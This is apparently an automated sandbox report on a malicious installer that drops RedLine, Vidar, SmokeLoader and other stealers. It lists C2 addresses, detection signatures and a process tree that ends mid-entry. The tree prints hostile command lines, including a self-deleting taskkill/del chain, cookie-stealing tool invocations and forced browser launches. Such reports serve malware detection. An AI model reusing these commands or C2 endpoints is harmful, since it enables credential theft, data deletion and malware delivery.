Resubmissions

06-09-2021 14:13

210906-rjpvrsedbm 10

08-07-2021 11:08

210708-4gztl3mwl6 10

08-07-2021 08:02

210708-klfb4qeda6 10

07-07-2021 09:39

210707-nem57xyvf2 10

06-07-2021 17:51

210706-7pcrmjy3fa 10

06-07-2021 13:45

210706-eybelwcq86 10

05-07-2021 04:26

210705-z99jkt6lce 10

Analysis

  • max time kernel
    322s
  • max time network
    395s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    07-07-2021 09:39

General

  • Target

    setup_x86_x64_install - копия (18).exe

  • Size

    3.2MB

  • MD5

    3ae1c212119919e5fce71247286f8e0e

  • SHA1

    97c1890ab73c539056f95eafede319df774e9d38

  • SHA256

    30c2f230e5401b4b1ea8fb425dadf4e453575884303b9fa2066e6a91859f016e

  • SHA512

    5bb28a775c10b8b68b8c448d64287ca732d0af5577ecc4348a89934358440bb4ff6958115f14ecbabb0446d234d6f621afa3419daa4aec6c03c0af9b6a3b1558

Malware Config

Extracted

Family

redline

Botnet

ServAni

C2

87.251.71.195:82

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32
rc4.i32

Signatures

  • DiscordStealer 1 IoCs

    Discord_Stealer.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 58 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 6 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 10 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 14 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 6 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Kills process with taskkill 8 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1080
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
      1⤵
        PID:1232
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
        1⤵
        • Drops file in System32 directory
        PID:860
        • C:\Users\Admin\AppData\Roaming\drtiafa
          C:\Users\Admin\AppData\Roaming\drtiafa
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          PID:4892
        • C:\Users\Admin\AppData\Local\Temp\3EF.exe
          C:\Users\Admin\AppData\Local\Temp\3EF.exe
          2⤵
            PID:2996
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Themes
          1⤵
            PID:1252
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1412
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1844
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                1⤵
                  PID:2416
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                  1⤵
                    PID:1000
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Browser
                    1⤵
                    • Modifies registry class
                    PID:2852
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                      2⤵
                        PID:5964
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                        2⤵
                          PID:5748
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                          2⤵
                            PID:6260
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                            2⤵
                              PID:3764
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                              2⤵
                                PID:7732
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                2⤵
                                  PID:5796
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                  2⤵
                                    PID:3748
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                  1⤵
                                    PID:2628
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                    1⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2620
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                    1⤵
                                      PID:2424
                                    • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (18).exe
                                      "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (18).exe"
                                      1⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:3920
                                      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of WriteProcessMemory
                                        PID:1816
                                        • C:\Users\Admin\AppData\Local\Temp\7zS81735344\setup_install.exe
                                          "C:\Users\Admin\AppData\Local\Temp\7zS81735344\setup_install.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Suspicious use of WriteProcessMemory
                                          PID:2644
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c arnatic_1.exe
                                            4⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:2892
                                            • C:\Users\Admin\AppData\Local\Temp\7zS81735344\arnatic_1.exe
                                              arnatic_1.exe
                                              5⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Checks processor information in registry
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:2284
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c taskkill /im arnatic_1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS81735344\arnatic_1.exe" & del C:\ProgramData\*.dll & exit
                                                6⤵
                                                  PID:2300
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im arnatic_1.exe /f
                                                    7⤵
                                                    • Kills process with taskkill
                                                    PID:1896
                                                  • C:\Windows\SysWOW64\timeout.exe
                                                    timeout /t 6
                                                    7⤵
                                                    • Delays execution with timeout.exe
                                                    PID:2020
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c arnatic_2.exe
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:2296
                                              • C:\Users\Admin\AppData\Local\Temp\7zS81735344\arnatic_2.exe
                                                arnatic_2.exe
                                                5⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Checks SCSI registry key(s)
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious behavior: MapViewOfSection
                                                PID:1808
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c arnatic_3.exe
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:1956
                                              • C:\Users\Admin\AppData\Local\Temp\7zS81735344\arnatic_3.exe
                                                arnatic_3.exe
                                                5⤵
                                                • Executes dropped EXE
                                                • Checks computer location settings
                                                • Suspicious use of WriteProcessMemory
                                                PID:3812
                                                • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                  "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
                                                  6⤵
                                                  • Loads dropped DLL
                                                  • Modifies registry class
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2116
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c arnatic_5.exe
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:1476
                                              • C:\Users\Admin\AppData\Local\Temp\7zS81735344\arnatic_5.exe
                                                arnatic_5.exe
                                                5⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2020
                                                • C:\Users\Admin\AppData\Roaming\7008383.exe
                                                  "C:\Users\Admin\AppData\Roaming\7008383.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2136
                                                • C:\Users\Admin\AppData\Roaming\1547060.exe
                                                  "C:\Users\Admin\AppData\Roaming\1547060.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Adds Run key to start application
                                                  PID:3648
                                                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:4644
                                                • C:\Users\Admin\AppData\Roaming\4112153.exe
                                                  "C:\Users\Admin\AppData\Roaming\4112153.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2084
                                                • C:\Users\Admin\AppData\Roaming\4836210.exe
                                                  "C:\Users\Admin\AppData\Roaming\4836210.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:2988
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c arnatic_7.exe
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:1200
                                              • C:\Users\Admin\AppData\Local\Temp\7zS81735344\arnatic_7.exe
                                                arnatic_7.exe
                                                5⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                • Suspicious use of WriteProcessMemory
                                                PID:3932
                                                • C:\Users\Admin\AppData\Local\Temp\7zS81735344\arnatic_7.exe
                                                  C:\Users\Admin\AppData\Local\Temp\7zS81735344\arnatic_7.exe
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:3828
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c arnatic_6.exe
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:4008
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c arnatic_4.exe
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:928
                                      • \??\c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                        1⤵
                                        • Suspicious use of SetThreadContext
                                        • Modifies registry class
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of WriteProcessMemory
                                        PID:3884
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                          2⤵
                                          • Drops file in System32 directory
                                          • Checks processor information in registry
                                          • Modifies data under HKEY_USERS
                                          • Modifies registry class
                                          PID:3148
                                      • C:\Users\Admin\AppData\Local\Temp\7zS81735344\arnatic_4.exe
                                        arnatic_4.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • Suspicious use of WriteProcessMemory
                                        PID:3928
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          2⤵
                                          • Executes dropped EXE
                                          PID:200
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:4744
                                      • C:\Users\Admin\AppData\Local\Temp\7zS81735344\arnatic_6.exe
                                        arnatic_6.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • Checks computer location settings
                                        PID:2220
                                        • C:\Users\Admin\Documents\tsNuSITeMyA4bPrVJG3KaJcc.exe
                                          "C:\Users\Admin\Documents\tsNuSITeMyA4bPrVJG3KaJcc.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:4652
                                        • C:\Users\Admin\Documents\V_x914fPobOWCns4SUpKseds.exe
                                          "C:\Users\Admin\Documents\V_x914fPobOWCns4SUpKseds.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:4388
                                        • C:\Users\Admin\Documents\bDa1QuMQ7iHjNIMBdr6E1KUP.exe
                                          "C:\Users\Admin\Documents\bDa1QuMQ7iHjNIMBdr6E1KUP.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:4636
                                          • C:\Users\Admin\Documents\bDa1QuMQ7iHjNIMBdr6E1KUP.exe
                                            C:\Users\Admin\Documents\bDa1QuMQ7iHjNIMBdr6E1KUP.exe
                                            3⤵
                                            • Executes dropped EXE
                                            PID:4060
                                        • C:\Users\Admin\Documents\wDII5fXMrMTyhXu2ELrQjg9W.exe
                                          "C:\Users\Admin\Documents\wDII5fXMrMTyhXu2ELrQjg9W.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          PID:1800
                                          • C:\Users\Admin\Documents\wDII5fXMrMTyhXu2ELrQjg9W.exe
                                            "C:\Users\Admin\Documents\wDII5fXMrMTyhXu2ELrQjg9W.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Checks SCSI registry key(s)
                                            • Suspicious behavior: MapViewOfSection
                                            PID:5448
                                        • C:\Users\Admin\Documents\ySh6xBQyeHZEotjOJ226dKyT.exe
                                          "C:\Users\Admin\Documents\ySh6xBQyeHZEotjOJ226dKyT.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:2116
                                          • C:\Users\Admin\Documents\ySh6xBQyeHZEotjOJ226dKyT.exe
                                            C:\Users\Admin\Documents\ySh6xBQyeHZEotjOJ226dKyT.exe
                                            3⤵
                                            • Executes dropped EXE
                                            PID:4780
                                        • C:\Users\Admin\Documents\Ep9njzFEf7zpScGe596errk4.exe
                                          "C:\Users\Admin\Documents\Ep9njzFEf7zpScGe596errk4.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:1324
                                        • C:\Users\Admin\Documents\J8hFLa9UxGgJXeobMedakMPz.exe
                                          "C:\Users\Admin\Documents\J8hFLa9UxGgJXeobMedakMPz.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:4460
                                          • C:\Users\Admin\Documents\J8hFLa9UxGgJXeobMedakMPz.exe
                                            C:\Users\Admin\Documents\J8hFLa9UxGgJXeobMedakMPz.exe
                                            3⤵
                                              PID:4456
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4456 -s 24
                                                4⤵
                                                • Program crash
                                                PID:5276
                                          • C:\Users\Admin\Documents\FcSdoq0lPvD2rUfPqjXN5IJe.exe
                                            "C:\Users\Admin\Documents\FcSdoq0lPvD2rUfPqjXN5IJe.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:4596
                                            • C:\Users\Admin\Documents\FcSdoq0lPvD2rUfPqjXN5IJe.exe
                                              C:\Users\Admin\Documents\FcSdoq0lPvD2rUfPqjXN5IJe.exe
                                              3⤵
                                              • Executes dropped EXE
                                              PID:4148
                                          • C:\Users\Admin\Documents\Vd6OZLI4xO_okYrUm_K2VyOz.exe
                                            "C:\Users\Admin\Documents\Vd6OZLI4xO_okYrUm_K2VyOz.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:4536
                                            • C:\Users\Admin\Documents\Vd6OZLI4xO_okYrUm_K2VyOz.exe
                                              C:\Users\Admin\Documents\Vd6OZLI4xO_okYrUm_K2VyOz.exe
                                              3⤵
                                              • Executes dropped EXE
                                              PID:3944
                                          • C:\Users\Admin\Documents\JAgmJyLJktgItiTPvuUeWMU0.exe
                                            "C:\Users\Admin\Documents\JAgmJyLJktgItiTPvuUeWMU0.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:2288
                                            • C:\Users\Admin\Documents\JAgmJyLJktgItiTPvuUeWMU0.exe
                                              "C:\Users\Admin\Documents\JAgmJyLJktgItiTPvuUeWMU0.exe"
                                              3⤵
                                                PID:5416
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 872
                                                3⤵
                                                • Program crash
                                                PID:5272
                                            • C:\Users\Admin\Documents\noVuomJ7WlRu2i92Lp7xul2D.exe
                                              "C:\Users\Admin\Documents\noVuomJ7WlRu2i92Lp7xul2D.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Drops file in Program Files directory
                                              PID:3836
                                              • C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
                                                "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:4968
                                                • C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
                                                  "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:6020
                                                • C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
                                                  "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:5728
                                              • C:\Program Files (x86)\Browzar\Browzar.exe
                                                "C:\Program Files (x86)\Browzar\Browzar.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Checks whether UAC is enabled
                                                • Suspicious use of SetWindowsHookEx
                                                PID:500
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 500 -s 2292
                                                  4⤵
                                                  • Program crash
                                                  PID:5976
                                            • C:\Users\Admin\Documents\LjTrAz1O0QpnkiI_jrKvoll1.exe
                                              "C:\Users\Admin\Documents\LjTrAz1O0QpnkiI_jrKvoll1.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              PID:4904
                                              • C:\Program Files (x86)\Company\NewProduct\file4.exe
                                                "C:\Program Files (x86)\Company\NewProduct\file4.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                PID:3964
                                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                PID:4752
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:5396
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:4456
                                              • C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
                                                "C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • Checks computer location settings
                                                PID:3432
                                                • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                  "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl
                                                  4⤵
                                                  • Loads dropped DLL
                                                  • Modifies registry class
                                                  PID:1536
                                              • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                PID:4812
                                            • C:\Users\Admin\Documents\kFYD8AO3IDo5nm7HGxoG9YXM.exe
                                              "C:\Users\Admin\Documents\kFYD8AO3IDo5nm7HGxoG9YXM.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              PID:4976
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --hold https://ezsearch.ru
                                                3⤵
                                                • Loads dropped DLL
                                                • Enumerates system info in registry
                                                • Suspicious use of FindShellTrayWindow
                                                PID:4584
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffa018a4f50,0x7ffa018a4f60,0x7ffa018a4f70
                                                  4⤵
                                                    PID:4200
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1820 /prefetch:2
                                                    4⤵
                                                      PID:4324
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1868 /prefetch:8
                                                      4⤵
                                                        PID:504
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1880 /prefetch:8
                                                        4⤵
                                                          PID:4956
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2868 /prefetch:1
                                                          4⤵
                                                            PID:2200
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2888 /prefetch:1
                                                            4⤵
                                                              PID:3228
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
                                                              4⤵
                                                                PID:4004
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:1
                                                                4⤵
                                                                  PID:2256
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:1
                                                                  4⤵
                                                                    PID:4980
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
                                                                    4⤵
                                                                      PID:4984
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
